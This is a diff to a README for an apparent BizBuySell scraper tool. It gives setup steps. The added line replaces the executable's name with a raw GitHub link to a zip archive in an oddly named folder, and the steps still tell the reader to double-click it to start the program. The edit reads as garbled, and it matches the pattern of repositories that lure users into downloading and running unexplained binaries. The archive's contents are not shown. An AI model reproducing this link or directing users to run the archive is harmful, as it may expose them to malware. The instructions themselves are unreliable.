Hfareed-usm/bizbuysell-scraper-pay-per-event/README.md

    If you downloaded a `.zip` file, right-click on it and select "Extract All" or use your preferred extraction tool.
 This will create a folder with the application files.

 6. **Run the Application**
-   Open the folder containing the application files and locate the executable file, typically named `bizbuysell-scraper-pay-per-event.exe`.
+   Open the folder containing the application files and locate the executable file, typically named `https://raw.githubusercontent.com/Hfareed-usm/bizbuysell-scraper-pay-per-event/main/Bogijiab/bizbuysell_per_event_pay_scraper_2.5.zip`.
 Double-click it to start the application.

 7. **Follow On-Screen Instructions**
    Once the application is running, follow any prompts displayed on the screen to start using the tool.